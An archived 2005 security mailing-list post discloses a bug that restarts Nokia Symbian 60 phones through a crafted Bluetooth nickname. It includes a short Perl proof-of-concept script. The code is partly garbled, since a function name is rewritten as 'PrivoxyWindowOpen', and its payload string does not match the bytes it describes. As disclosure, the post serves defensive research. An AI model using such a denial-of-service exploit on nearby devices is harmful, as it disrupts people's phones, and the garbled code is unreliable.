Ethical Hacking Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package. | Computer Forensics Training at InfoSec Institute Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors. |

| Subject: | Nokia Symbian 60 "BLUETOOTH NICKNAME" Remote Restart |
|---|---|
| Date: | 27 Jun 2005 08:55:23 -0000 |
When i was playing with my bluetooth device,
i found that if you add in your nickname " 09 0a " in hex, it will cause that
every one who search for available bluetooth devices and find your nickname his
nokia phone will restart.
you should add a nicname like that,
[something][09 0a in hex][just add anything here]
you should add anything before 09 0a because the nokia phones think that its a
space at the end, and it will auto deleted so you should add any thing before
090a .
nokia-bt-cx.pl
-------------start---------------
#!/usr/bin/perl -w
my $btnick;
my $bth;
my $bts;
my $file;
$bth = " .";
print "\n*******************************************************\n";
print "** NOKIA REMOTE RESTART IN BLUETOOTH NICKNAME **\n";
print "** BY QNIX | Q-nix[@]bsdmail[dot]org **\n";
print "*******************************************************\n";
print " \n write your nickname : ";
$btnick = <STDIN>;
chomp($btnick);
print " \n OUTPUT : ";
$file = <STDIN>;
chomp($file);
PrivoxyWindowOpen(BLUEN, ">>$file") || die "Could not create file $!\n";
$bts = "$btnick$bth";
print BLUEN ("$bts");
close(BLUEN);
print "\n Done !! , send the output to your nokia and copy the file to the
bluetooth nickname space . \n\n";
-------------end-----------------
may be someone got more information about that bug or any thing else.
and maybe someone can develop that problem.
| <Prev in Thread] | Current Thread | [Next in Thread> |
|---|---|---|
| ||
| Previous by Date: | Phishing Solutions (was: Phishing - feature or flaw), Chris Brenton |
|---|---|
| Next by Date: | M4DR007-07SA (security advisory): Multiple vulnerabilities in ASP Nuke 0.80, Alberto Trivero |
| Previous by Thread: | Denial of Service Vulnerability in True North Software, Inc. IA eMailServer Corporate Edition Version: 5.2.2. Build: 1051., Reed Arvin |
| Next by Thread: | Re: Nokia Symbian 60 "BLUETOOTH NICKNAME" Remote Restart, Alex Renn Jr. |
| Indexes: | [Date] [Thread] [Top] [All Lists] |